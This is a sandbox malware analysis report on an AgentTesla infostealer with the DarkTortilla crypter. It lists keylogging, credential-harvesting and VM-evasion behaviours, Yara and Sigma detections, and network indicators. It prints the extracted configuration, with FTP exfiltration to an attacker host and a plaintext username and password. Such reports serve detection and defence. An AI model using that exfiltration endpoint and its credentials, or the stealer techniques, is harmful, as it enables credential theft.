Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTATIONS#08670.exe

Overview

General Information

Sample name:QUOTATIONS#08670.exe
Analysis ID:1524956
MD5:b88a9908634769557e2b6396f634c4ae
SHA1:49ee7bf7463600dd8cd4b650ac0644c1a4ffb239
SHA256:fa7d9ffd715033a0b922b2b65f1fa6da05bb9feafe1432a9cc0863f7f640a3f9
Tags:exeuser-threatcat_ch
Infos:

Detection

AgentTesla, DarkTortilla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • QUOTATIONS#08670.exe (PID: 7592 cmdline: "C:\Users\user\Desktop\QUOTATIONS#08670.exe" MD5: B88A9908634769557E2B6396F634C4AE)
    • QUOTATIONS#08670.exe (PID: 8124 cmdline: "C:\Users\user\Desktop\QUOTATIONS#08670.exe" MD5: B88A9908634769557E2B6396F634C4AE)
  • newapp.exe (PID: 6576 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: B88A9908634769557E2B6396F634C4AE)
    • newapp.exe (PID: 1656 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: B88A9908634769557E2B6396F634C4AE)
  • newapp.exe (PID: 3820 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: B88A9908634769557E2B6396F634C4AE)
    • newapp.exe (PID: 2084 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: B88A9908634769557E2B6396F634C4AE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.ercolina-usa.com", "Username": "me@ercolina-usa.com", "Password": "uy,o#mZj8$lY"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2575902767.00000000030B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000004.00000002.2575902767.00000000030B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.2017156067.00000000036DA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.2017156067.00000000036DA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000009.00000002.2575069317.0000000002A61000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
            Click to see the 37 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.2.newapp.exe.3cc54ba.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              9.2.newapp.exe.3cc54ba.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                9.2.newapp.exe.3cc54ba.4.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x33a0e:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x33a80:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x33b0a:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x33b9c:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x33c06:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x33c78:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x33d0e:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x33d9e:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                9.2.newapp.exe.3cc54ba.4.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                • 0x30c22:$s2: GetPrivateProfileString
                • 0x302af:$s3: get_OSFullName
                • 0x319b2:$s5: remove_Key
                • 0x31b7b:$s5: remove_Key
                • 0x32abb:$s6: FtpWebRequest
                • 0x339f0:$s7: logins
                • 0x33f62:$s7: logins
                • 0x36cdb:$s7: logins
                • 0x36d25:$s7: logins
                • 0x387ee:$s7: logins
                • 0x378bf:$s9: 1.85 (Hash, version 2, native byte-order)
                8.2.newapp.exe.4345322.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 125 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\newapp\newapp.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\QUOTATIONS#08670.exe, ProcessId: 8124, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\newapp

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.ercolina-usa.com", "Username": "me@ercolina-usa.com", "Password": "uy,o#mZj8$lY"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeReversingLabs: Detection: 23%
                  Multi AV Scanner detection for submitted file
                  Source: QUOTATIONS#08670.exeReversingLabs: Detection: 23%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: QUOTATIONS#08670.exeJoe Sandbox ML: detected
                  Source: QUOTATIONS#08670.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.11:62916 version: TLS 1.2
                  Source: QUOTATIONS#08670.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Joe Sandbox ViewIP Address: 192.254.225.136 192.254.225.136
                  Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                  Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownFTP traffic detected: 192.254.225.136:21 -> 192.168.2.11:62918 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 150 allowed.220-Local time is now 07:29. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 150 allowed.220-Local time is now 07:29. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 150 allowed.220-Local time is now 07:29. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                  Source: global trafficDNS traffic detected: DNS query: ftp.ercolina-usa.com
                  Source: QUOTATIONS#08670.exe, 00000004.00000002.2575902767.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000004.00000002.2575902767.000000000314E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ercolina-usa.com
                  Source: QUOTATIONS#08670.exe, 00000004.00000002.2575902767.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000004.00000002.2575902767.000000000314E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.ercolina-usa.com
                  Source: newapp.exe, 00000009.00000002.2570999762.0000000000B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
                  Source: newapp.exe, 00000009.00000002.2570999762.0000000000B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.cinkI
                  Source: newapp.exe, 00000009.00000002.2605752686.0000000005EE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oen
                  Source: QUOTATIONS#08670.exe, 00000004.00000002.2575902767.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000004.00000002.2570779363.0000000000402000.00000040.00000400.00020000.00000000.sdmp, newapp.exe, 00000008.00000002.2597502551.0000000004213000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000008.00000002.2597502551.0000000004345000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000008.00000002.2597502551.000000000413F000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000009.00000002.2596669969.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000009.00000002.2596669969.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000009.00000002.2596669969.0000000003B94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000004.00000002.2575902767.0000000003061000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000004.00000002.2570779363.0000000000402000.00000040.00000400.00020000.00000000.sdmp, newapp.exe, 00000008.00000002.2597502551.0000000004213000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000008.00000002.2597502551.0000000004345000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000008.00000002.2597502551.000000000413F000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000009.00000002.2596669969.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000009.00000002.2596669969.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000009.00000002.2596669969.0000000003B94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: QUOTATIONS#08670.exe, 00000004.00000002.2575902767.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: QUOTATIONS#08670.exe, 00000004.00000002.2575902767.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62916 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62916
                  Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.11:62916 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, SKTzxzsJw.cs.Net Code: kwpilQkK
                  Source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.raw.unpack, SKTzxzsJw.cs.Net Code: kwpilQkK
                  Source: 0.2.QUOTATIONS#08670.exe.391cf70.5.raw.unpack, SKTzxzsJw.cs.Net Code: kwpilQkK
                  Source: 0.2.QUOTATIONS#08670.exe.3828c62.4.raw.unpack, SKTzxzsJw.cs.Net Code: kwpilQkK
                  Source: 0.2.QUOTATIONS#08670.exe.3865d32.3.raw.unpack, SKTzxzsJw.cs.Net Code: kwpilQkK
                  Installs a global keyboard hook
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\QUOTATIONS#08670.exeJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 9.2.newapp.exe.3cc54ba.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.newapp.exe.3cc54ba.4.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 8.2.newapp.exe.4345322.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 8.2.newapp.exe.4345322.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 8.2.newapp.exe.43823e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 8.2.newapp.exe.43823e0.4.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.newapp.exe.3d02578.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.newapp.exe.3d02578.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 8.2.newapp.exe.428e0d2.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 8.2.newapp.exe.428e0d2.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.QUOTATIONS#08670.exe.3828c62.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.QUOTATIONS#08670.exe.3828c62.4.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.QUOTATIONS#08670.exe.391cf70.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.QUOTATIONS#08670.exe.391cf70.5.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 8.2.newapp.exe.4250ff2.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 8.2.newapp.exe.4250ff2.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.newapp.exe.3c4b33a.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.newapp.exe.3c4b33a.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.newapp.exe.3c0e26a.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.newapp.exe.3c0e26a.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.newapp.exe.3c4b33a.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.newapp.exe.3c4b33a.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 4.2.QUOTATIONS#08670.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.QUOTATIONS#08670.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.newapp.exe.3bd118a.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.newapp.exe.3bd118a.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.newapp.exe.3d02578.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.newapp.exe.3d02578.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 8.2.newapp.exe.42cb1a2.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 8.2.newapp.exe.42cb1a2.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.newapp.exe.3c0e26a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.newapp.exe.3c0e26a.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.QUOTATIONS#08670.exe.3865d32.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.QUOTATIONS#08670.exe.3865d32.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.QUOTATIONS#08670.exe.3865d32.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.QUOTATIONS#08670.exe.3865d32.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 8.2.newapp.exe.428e0d2.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 8.2.newapp.exe.428e0d2.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.QUOTATIONS#08670.exe.3828c62.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.QUOTATIONS#08670.exe.3828c62.4.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.newapp.exe.3cc54ba.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.newapp.exe.3cc54ba.4.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 8.2.newapp.exe.43823e0.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 8.2.newapp.exe.43823e0.4.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 8.2.newapp.exe.42cb1a2.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 8.2.newapp.exe.42cb1a2.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 8.2.newapp.exe.4345322.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 8.2.newapp.exe.4345322.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 9.2.newapp.exe.3bd118a.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.newapp.exe.3bd118a.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 8.2.newapp.exe.4250ff2.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 8.2.newapp.exe.4250ff2.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.QUOTATIONS#08670.exe.391cf70.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.QUOTATIONS#08670.exe.391cf70.5.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: QUOTATIONS#08670.exe
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_07929CD0 CreateProcessAsUserW,0_2_07929CD0
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_008F86F90_2_008F86F9
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_008FAC380_2_008FAC38
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_008F79B80_2_008F79B8
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_008FCD880_2_008FCD88
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_06D232E80_2_06D232E8
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_06D2B8A00_2_06D2B8A0
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_06D232D90_2_06D232D9
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_06D2D2100_2_06D2D210
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_071235380_2_07123538
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_0712DD700_2_0712DD70
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_0712DD6F0_2_0712DD6F
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_071E22100_2_071E2210
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_071ECBA00_2_071ECBA0
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_071ECBD00_2_071ECBD0
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_079227C00_2_079227C0
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_07923FF80_2_07923FF8
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_07924B2B0_2_07924B2B
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_0792A2500_2_0792A250
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_079227BF0_2_079227BF
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_079237D80_2_079237D8
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_07923FE80_2_07923FE8
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_0792F2B00_2_0792F2B0
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_07927E280_2_07927E28
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_079285900_2_07928590
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_0792E9500_2_0792E950
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_0792003A0_2_0792003A
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_079268270_2_07926827
